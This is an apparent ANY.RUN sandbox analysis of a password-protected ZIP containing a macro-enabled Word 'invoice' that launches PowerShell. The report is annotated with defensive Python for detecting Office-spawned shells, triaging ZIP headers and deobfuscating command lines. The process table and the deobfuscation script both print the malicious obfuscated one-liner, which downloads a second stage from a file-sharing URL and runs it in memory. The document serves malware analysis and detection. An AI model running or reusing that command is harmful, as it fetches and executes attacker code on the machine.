File name: f2d0c66b801244c059f636d08a474079.zip
Full analysis: https://app.any.run/tasks/06513649-1118-460e-85b8-9d1e3d48b29e
Verdict: Malicious activity
Analysis date: May 25, 2024, 05:15:09
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract, compression method=deflate
MD5: 2C250C119ED943D4CC6A8ECE189213E4
SHA1: AEF2057D95DA28AE2855118DAB03A82936888858
SHA256: 9DA040B601DB75CB64FE4779CBA274A42C732E34FDD3226183E30D36E8427BCC
SSDEEP: 384:9pqmGxmmLHAZbgLjs8HejYyEPEXHqZ6lcxsO:3k4mLHANgLQ8jlMe

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Microsoft Office executes commands via PowerShell or Cmd

      • WINWORD.EXE (PID: 4080)
    • Starts POWERSHELL.EXE for commands execution

      • WINWORD.EXE (PID: 4080)
    • Unusual execution from MS Office

      • WINWORD.EXE (PID: 4080)
    • Request from PowerShell that ran from MS Office

      • powershell.exe (PID: 752)
  • SUSPICIOUS

    • Runs shell command (SCRIPT)

      • WINWORD.EXE (PID: 4080)
    • Obfuscated call of IEX

      • powershell.exe (PID: 752)
    • Reads the Internet Settings

      • powershell.exe (PID: 752)
    • Unusual connection from system programs

      • powershell.exe (PID: 752)
    • The Powershell connects to the Internet

      • powershell.exe (PID: 752)
  • INFO

    • Manual execution by a user

      • WINWORD.EXE (PID: 4080)
      • wmpnscfg.exe (PID: 1056)
    • Disables trace logs

      • powershell.exe (PID: 752)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 752)
    • Reads the computer name

      • wmpnscfg.exe (PID: 1056)
    • Checks supported languages

      • wmpnscfg.exe (PID: 1056)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
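All four MALICIOUS signatures above describe one structural fact: a Microsoft Word process (PID 4080) spawned powershell.exe (PID 752), and that child then went to the network. As an added example, not ANY.RUN's own signature logic, the following Python evaluates that rule over process-creation events of the kind Sysmon Event ID 1 or an EDR sensor emits. It walks the full ancestry rather than only the direct parent, so an Office -> cmd -> PowerShell chain is caught as well. The events are constructed from the process table further down in this report; explorer.exe's PID (1234) and the cmd.exe/second powershell.exe pair (2100, 2200) are invented for illustration and do not appear in the report.

```python
# Process-creation events constructed from the "Process information" table of this
# report: PIDs, images and parents as listed there. explorer.exe's own PID is not in
# the report, so 1234 is assumed; the cmd.exe/powershell.exe pair (2100, 2200) is
# invented to show a nested chain that a parent-only check would miss.
EVENTS = [
    {"pid": 1234, "ppid": 0,    "image": r"C:\Windows\explorer.exe"},                       # assumed PID
    {"pid": 3968, "ppid": 1234, "image": r"C:\Program Files\WinRAR\WinRAR.exe"},
    {"pid": 4080, "ppid": 1234, "image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"},
    {"pid": 752,  "ppid": 4080, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"pid": 1056, "ppid": 1234, "image": r"C:\Program Files\Windows Media Player\wmpnscfg.exe"},
    {"pid": 2100, "ppid": 4080, "image": r"C:\Windows\System32\cmd.exe"},                   # constructed
    {"pid": 2200, "ppid": 2100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},  # constructed
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
               "msaccess.exe", "mspub.exe", "onenote.exe", "visio.exe"}
# Interpreters and LOLBins a document has no business launching.
SHELL_LIKE = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
              "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}


def image_name(path: str) -> str:
    """Lower-cased file name of an image path, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(events, pid):
    """Image names from pid upwards: [self, parent, grandparent, ...]."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)                      # guard against PID-reuse loops in real telemetry
        chain.append(image_name(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def detect_office_spawned_shells(events):
    """One alert per shell-like process that has an Office application anywhere above it."""
    alerts = []
    for e in events:
        name = image_name(e["image"])
        if name not in SHELL_LIKE:
            continue
        chain = ancestry(events, e["pid"])
        for depth, ancestor in enumerate(chain[1:], start=1):
            if ancestor in OFFICE_APPS:
                alerts.append({
                    "pid": e["pid"],
                    "image": name,
                    "office_parent": ancestor,
                    "depth": depth,                          # 1 = direct child
                    "chain": " > ".join(reversed(chain)),    # root first, offender last
                })
                break
    return alerts


if __name__ == "__main__":
    for a in detect_office_spawned_shells(EVENTS):
        print(f"PID {a['pid']}: {a['chain']} (Office ancestor {a['office_parent']}, depth {a['depth']})")
```

On the report's own processes this fires once, for PID 752 with the chain explorer.exe > winword.exe > powershell.exe, and stays silent for WinRAR and wmpnscfg.exe, which explorer.exe started directly. The depth field is what separates "Office ran PowerShell" from "Office ran cmd which ran PowerShell"; both deserve the same severity.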
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 788 (raw 16-bit field, 0x0314; the low byte 20 means ZIP 2.0, matching "at least v2.0 to extract" above)
ZipBitFlag: 0x0001 (general-purpose bit 0 set: the entry is marked encrypted, i.e. the archive is password-protected; WinRAR nevertheless extracted it in this run, see PID 3968 under Dropped files, so a password was supplied)
ZipCompression: Deflated
ZipModifyDate: 2021:03:14 21:03:34
ZipCRC: 0xe5a2bb63
ZipCompressedSize: 14161
ZipUncompressedSize: 17057
ZipFileName: INVOICE PACKAGE LINK TO DOWNLOAD.docm (macro-enabled Word document)
No data.
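The EXIF block above is everything a mail gateway or triage script can see without the password: a ZIP 2.0 entry with the encryption bit set wrapping a macro-enabled .docm. As an added example (editor's own code, not part of the ANY.RUN report), the Python below decodes those same header fields with the standard library's zipfile module and turns them into a risk verdict. The sample archive is hand-assembled so the version and flag fields can be set to the report's values; the payload bytes are a placeholder and are not really encrypted, and the extension lists and risk thresholds are the editor's choices.

```python
import io
import os
import struct
import zipfile
import zlib

MACRO_DOCS = {".docm", ".dotm", ".xlsm", ".xltm", ".xlam", ".pptm", ".potm", ".ppam"}
DIRECT_EXEC = {".exe", ".scr", ".dll", ".js", ".jse", ".vbs", ".vbe", ".hta", ".lnk",
               ".bat", ".cmd", ".ps1", ".iso", ".img"}


def dos_datetime(year, month, day, hour, minute, second):
    """MS-DOS packed time and date words as stored in ZIP headers."""
    t = (hour << 11) | (minute << 5) | (second // 2)
    d = ((year - 1980) << 9) | (month << 5) | day
    return t, d


def build_zip(name: str, payload: bytes, flags: int, version_needed: int,
              mtime=(2021, 3, 14, 21, 3, 34)) -> bytes:
    """Hand-assemble a one-entry ZIP so header fields can be set freely.

    Constructed test data: with flags=0x0001 only the 'encrypted' bit is set;
    the payload is stored as plain raw-deflate and is not actually encrypted.
    """
    name_b = name.encode("cp437")
    comp = zlib.compress(payload)[2:-4]             # raw deflate: drop zlib header and adler32
    crc = zlib.crc32(payload) & 0xFFFFFFFF
    t, d = dos_datetime(*mtime)
    local = struct.pack("<IHHHHHIIIHH", 0x04034B50, version_needed, flags, 8, t, d,
                        crc, len(comp), len(payload), len(name_b), 0) + name_b + comp
    # "version made by" 0x0314 = Unix host byte 3, spec 2.0; local header offset is 0
    central = struct.pack("<IHHHHHHIIIHHHHHII", 0x02014B50, 0x0314, version_needed, flags, 8,
                          t, d, crc, len(comp), len(payload), len(name_b), 0, 0, 0, 0, 0, 0) + name_b
    eocd = struct.pack("<IHHHHIIH", 0x06054B50, 0, 0, 1, 1, len(central), len(local), 0)
    return local + central + eocd


# Mirrors the EXIF block above: version field 788 (0x0314), flag 0x0001, deflate, .docm inside.
SAMPLE_ZIP = build_zip("INVOICE PACKAGE LINK TO DOWNLOAD.docm",
                       b"PK\x03\x04 placeholder docm bytes (constructed)", 0x0001, 788)
BENIGN_ZIP = build_zip("notes.txt", b"quarterly numbers (constructed)\n", 0x0000, 20)


def risk(row: dict) -> str:
    dangerous = row["macro_document"] or row["executable_content"]
    if row["encrypted"] and dangerous:
        return "high"       # password-protected container around active content
    if row["encrypted"] or dangerous:
        return "medium"
    return "low"


def inspect_zip(data: bytes) -> list:
    """Decode the header fields the report shows, without extracting anything."""
    rows = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for zi in zf.infolist():
            ext = os.path.splitext(zi.filename)[1].lower()
            row = {
                "name": zi.filename,
                "encrypted": bool(zi.flag_bits & 0x0001),       # general-purpose bit 0
                "required_version": zi.extract_version / 10,    # low byte of the 16-bit field
                "version_high_byte": zi.reserved,               # 3 for the report's 0x0314
                "method": {0: "stored", 8: "deflated"}.get(zi.compress_type, str(zi.compress_type)),
                "mtime": "%04d:%02d:%02d %02d:%02d:%02d" % zi.date_time,
                "crc": "0x%08x" % zi.CRC,
                "sizes": (zi.compress_size, zi.file_size),
                "macro_document": ext in MACRO_DOCS,
                "executable_content": ext in DIRECT_EXEC,
            }
            row["risk"] = risk(row)
            rows.append(row)
    return rows


if __name__ == "__main__":
    for row in inspect_zip(SAMPLE_ZIP) + inspect_zip(BENIGN_ZIP):
        print(row)
```

zipfile splits the two-byte "version needed" field into extract_version (20) and reserved (3), which is why exiftool's 788 and the "v2.0 to extract" line in the file info agree. Note that the verdict is driven by metadata alone: the encryption bit, the inner extension and the timestamp are all readable before anyone enters a password, which is exactly the stage at which a password-protected invoice should be stopped.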
All screenshots are available in the full report
Total processes: 39
Monitored processes: 4
Malicious processes: 2
Suspicious processes: 0

Behavior graph

start
  winrar.exe (no specs)
  winword.exe (no specs)
    powershell.exe
  wmpnscfg.exe (no specs)

Process information

PID: 752
CMD: powershell I`EX ((n`e`W`-Obj`E`c`T (('Net'+'.'+'Webc'+'lient'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).InVokE((('https://filetransfer.io/data-package/UR2whuBv/download'))))
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1 (non-zero: the script terminated with an unhandled error, consistent with the "Script raised an exception" signature above; the report lists no dropped second-stage file, so the download-and-execute step did not visibly complete in this run)
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
PID: 1056
CMD: "C:\Program Files\Windows Media Player\wmpnscfg.exe"
Path: C:\Program Files\Windows Media Player\wmpnscfg.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Media Player Network Sharing Service Configuration Application
Exit code:
0
Version:
12.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\program files\windows media player\wmpnscfg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
PID: 3968
CMD: "C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\AppData\Local\Temp\f2d0c66b801244c059f636d08a474079.zip
Path: C:\Program Files\WinRAR\WinRAR.exe
Parent process: explorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
PID: 4080
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\INVOICE PACKAGE LINK TO DOWNLOAD.docm"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
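The command line recorded for PID 752 is the whole attack in one line, hidden with three cheap tricks: backticks inside cmdlet names (I`EX, n`e`W`-Obj`E`c`T), string literals split into single characters and padded with dozens of ''+ fragments, and redundant parentheses around every literal. Undone, it reads IEX ((New-Object Net.WebClient).DownloadString.Invoke(url)): fetch a second stage from filetransfer.io and run it in memory. As an added example (editor's own code, not part of the ANY.RUN report), the Python below reverses those transformations statically, recovers the URL, and returns the counters a process-creation rule can threshold on before any deobfuscation. The sample command line is copied from this report; the escape-character set, token table and regexes are the editor's choices.

```python
import re

# Command line recorded for powershell.exe (PID 752) in the report, copied verbatim.
SAMPLE_CMDLINE = r"""powershell I`EX ((n`e`W`-Obj`E`c`T (('Net'+'.'+'Webc'+'lient'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).InVokE((('https://filetransfer.io/data-package/UR2whuBv/download'))))"""

# Characters that form a real escape sequence after a backtick in PowerShell 5.1
# (`e and `u{} only exist from PowerShell 6 on). Kept lower-case: the sample's `T in
# Obj`E`c`T executed on the report's 5.1 host, so an upper-case letter after a tick is
# not treated as an escape here. A tick before anything else is noise and can be dropped.
PS51_ESCAPES = set("0abfnrtuv")

# Conventional spelling for the tokens this triage cares about (editor's table).
CANONICAL = {
    "iex": "IEX",
    "new-object": "New-Object",
    "net.webclient": "Net.WebClient",
    "downloadstring": "DownloadString",
    "invoke": "Invoke",
}


def strip_ticks(s: str) -> str:
    """Drop obfuscation backticks; leave real escapes and "..." strings untouched."""
    out, in_dq, i = [], False, 0
    while i < len(s):
        ch = s[i]
        if ch == '"':
            in_dq = not in_dq
        if ch == "`" and not in_dq and i + 1 < len(s) and s[i + 1] not in PS51_ESCAPES:
            i += 1                          # skip the tick, keep the character it "escaped"
            continue
        out.append(ch)
        i += 1
    return "".join(out)


def deobfuscate(cmdline: str) -> str:
    """Statically undo tick insertion, string splitting and parenthesis wrapping.

    Assumes the bare "powershell <args>" form seen in the report and single-quoted
    literals without '' escapes inside them.
    """
    s = re.sub(r'^\s*"?powershell(?:\.exe)?"?\s+', "", cmdline, flags=re.I)
    s = strip_ticks(s)
    concat = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")      # 'a'+'b' -> 'ab'; also eats ''+'' padding
    wrapped = re.compile(r"(?<![\w'])\(\s*('[^']*')\s*\)")  # ('lit') -> 'lit', but never f('lit')
    for pattern, repl in ((concat, lambda m: "'" + m.group(1) + m.group(2) + "'"),
                          (wrapped, r"\1")):
        while True:                         # repeat until a pass changes nothing
            s, n = pattern.subn(repl, s)
            if n == 0:
                break
    s = re.sub(r"\.'([A-Za-z_]\w*)'", r".\1", s)            # .'Member' (from .('Member')) -> .Member
    names = "|".join(map(re.escape, CANONICAL))
    return re.sub(r"\b(" + names + r")\b", lambda m: CANONICAL[m.group(0).lower()], s, flags=re.I)


def extract_urls(s: str) -> list:
    return re.findall(r"""https?://[^\s'"()]+""", s)


def obfuscation_indicators(cmdline: str) -> dict:
    """Cheap counters a process-creation rule can threshold on without deobfuscating."""
    return {
        "ticks": cmdline.count("`"),
        "concats": len(re.findall(r"'\s*\+\s*'", cmdline)),
        "empty_literals": cmdline.count("''"),
        "iex": re.search(r"\bi`?e`?x\b|invoke`?-`?expression", cmdline, re.I) is not None,
    }


def triage(cmdline: str) -> dict:
    clean = deobfuscate(cmdline)
    return {
        "deobfuscated": clean,
        "urls": extract_urls(clean),
        "indicators": obfuscation_indicators(cmdline),
        "download_primitive": re.search(r"\.download(string|file|data)\b", clean, re.I) is not None,
    }


if __name__ == "__main__":
    result = triage(SAMPLE_CMDLINE)
    print(result["deobfuscated"])
    print(result["urls"], result["indicators"], result["download_primitive"])
```

Run against the report's command line, triage() returns IEX ((New-Object 'Net.WebClient').DownloadString.Invoke('https://filetransfer.io/data-package/UR2whuBv/download')) with seven ticks and an obfuscated IEX flagged; the method-call parentheses survive because the wrapper regex refuses a parenthesis preceded by an identifier character. This is a static rewrite, not an evaluation: a sample that builds its strings with -f formatting, [char] arithmetic or Base64 needs PowerShell script-block logging (Event ID 4104) or a real interpreter to reveal the final command.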
Total events: 15 873
Read events: 14 982
Write events: 581
Delete events: 310

Modification events

(PID) Process | Operation | Key | Name | Value
(3968) WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes | ShellExtBMP | 
(3968) WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes | ShellExtIcon | 
(3968) WinRAR.exe | write | HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E | LanguageList | en-US
(3968) WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory | 3 | C:\Users\admin\Desktop\phacker.zip
(3968) WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory | 2 | C:\Users\admin\Desktop\Win7-KB3191566-x86.zip
(3968) WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory | 1 | C:\Users\admin\Desktop\curl-8.5.0_1-win32-mingw.zip
(3968) WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory | 0 | C:\Users\admin\AppData\Local\Temp\f2d0c66b801244c059f636d08a474079.zip
(3968) WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths | name | 120
(3968) WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths | size | 80
(3968) WinRAR.exe | write | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths | type | 120

All ten writes are WinRAR's own UI state (theme, MUI cache, column widths, archive history). The ArcHistory entries 1 to 3 (phacker.zip, Win7-KB3191566-x86.zip, curl-8.5.0_1-win32-mingw.zip) are archives previously opened in this sandbox image that WinRAR shifted down when it inserted the submitted file at position 0; they are not files written by the sample.
Executable files: 0
Suspicious files: 11
Text files: 1
Unknown types: 0

Dropped files

PID | Process | Filename | Type
4080 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRD851.tmp.cvr | (type not captured)
  MD5: (not captured)
  SHA256: (not captured)
4080 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\INVOICE PACKAGE LINK TO DOWNLOAD.docm.LNK | binary
  MD5: EE918C1C9BC8319F944390C132F11AE1
  SHA256: 4FEE31DDAF26F161DEC4B7C4690F2261DE48F54D32DA2EA4B767F4205959325F
752 | powershell.exe | C:\Users\admin\AppData\Local\Temp\lvdkvcb3.xar.ps1 | binary
  MD5: C4CA4238A0B923820DCC509A6F75849B
  SHA256: (not captured)
752 | powershell.exe | C:\Users\admin\AppData\Local\Temp\zubiuvqh.ago.psm1 | binary
  MD5: C4CA4238A0B923820DCC509A6F75849B
  SHA256: (not captured)
752 | powershell.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | compressed
  MD5: 29F65BA8E88C063813CC50A4EA544E93
  SHA256: 1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
752 | powershell.exe | C:\Users\admin\AppData\Local\Temp\CabE4E3.tmp | compressed
  MD5: 29F65BA8E88C063813CC50A4EA544E93
  SHA256: 1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
4080 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | binary
  MD5: 07023A215BFEDDD557C9456CA37B29DA
  SHA256: 05832CB7A8C1E218489E845864F9C1695A699D28ABD5417C3BBFC98D864E3221
752 | powershell.exe | C:\Users\admin\AppData\Local\Temp\TarE4E4.tmp | binary
  MD5: 435A9AC180383F9FA094131B173A2F7B
  SHA256: 67DC37ED50B8E63272B49A254A6039EE225974F1D767BB83EB1FD80E759A7C34
3968 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRb3968.43594\INVOICE PACKAGE LINK TO DOWNLOAD.docm | document
  MD5: F2D0C66B801244C059F636D08A474079
  SHA256: 08D4FD5032B8B24072BDFF43932630D4200F68404D7E12FFEEDA2364C8158873
4080 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | ini
  MD5: DDC65E4CEFF079278139C678A591FF1A
  SHA256: 178FF31FA4098E31C6CF6BD3AEED4F73250D5677A97C7AE8F04D72CDCD540155

Reading this list: the only attacker-controlled file on disk is the extracted document under Rar$DRb3968.43594; its MD5 F2D0C66B801244C059F636D08A474079 is the name the submitted ZIP was given. The two one-byte .ps1/.psm1 files share MD5 C4CA4238A0B923820DCC509A6F75849B, the hash of the single byte "1": they are the probe scripts PowerShell writes at startup to test AppLocker script policy, not attacker artifacts. The CryptnetUrlCache entry and CabE4E3.tmp are one and the same authrootstl.cab fetched from ctldl.windowsupdate.com (see HTTP requests), and TarE4E4.tmp is its extracted trust list. The .cvr, .LNK, ~$Normal.dotm and index.dat entries are ordinary Word housekeeping. No second-stage payload from filetransfer.io was written to disk.
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 1
TCP/UDP connections: 6
DNS requests: 2
Threats: 2

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
752 | powershell.exe | GET | 200 | 199.232.210.172:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?834959a41c0f6567 | unknown | unknown

This request is Windows' automatic root-certificate (CTL) update: validating the TLS certificate chain for the filetransfer.io connection made CryptoAPI fetch authrootstl.cab over plain HTTP. It is a side effect of the download attempt, not attacker infrastructure; the CAB is the file cached under CryptnetUrlCache in the Dropped files list. The HTTPS download from filetransfer.io itself is not decoded here, so only the TLS connection and SNI appear below.

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4 | System | 192.168.100.255:137 | | | | whitelisted
4 | System | 192.168.100.255:138 | | | | whitelisted
1088 | svchost.exe | 224.0.0.252:5355 | | | | unknown
752 | powershell.exe | 188.114.96.3:443 | filetransfer.io | CLOUDFLARENET | NL | unknown
752 | powershell.exe | 199.232.210.172:80 | ctldl.windowsupdate.com | FASTLY | US | unknown

The first three rows are the guest's own name-resolution chatter (NetBIOS name and datagram services on 137/138 to the subnet broadcast address, LLMNR on 224.0.0.252:5355) and carry no information about the sample. The connection that matters is powershell.exe (PID 752) to filetransfer.io over TLS, behind Cloudflare, which is the DownloadString target in the command line.

DNS requests

Domain | IP | Reputation
filetransfer.io | 188.114.96.3, 188.114.97.3 | malicious
ctldl.windowsupdate.com | 199.232.210.172, 199.232.214.172 | whitelisted

Threats

PID | Process | Class | Message
1088 | svchost.exe | Potentially Bad Traffic | ET INFO Commonly Abused File Sharing Domain in DNS Lookup (filetransfer .io)
752 | powershell.exe | Potentially Bad Traffic | ET INFO Commonly Abused File Sharing Domain (filetransfer .io in TLS SNI)

Both alerts are the same event seen twice: the DNS lookup is attributed to svchost.exe (PID 1088) because the DNS Client service resolves names on behalf of other processes, while the TLS SNI alert lands on the PowerShell process that actually opened the connection. The spaced "filetransfer .io" is the rule author's defanging of the domain, not a typo.
No debug info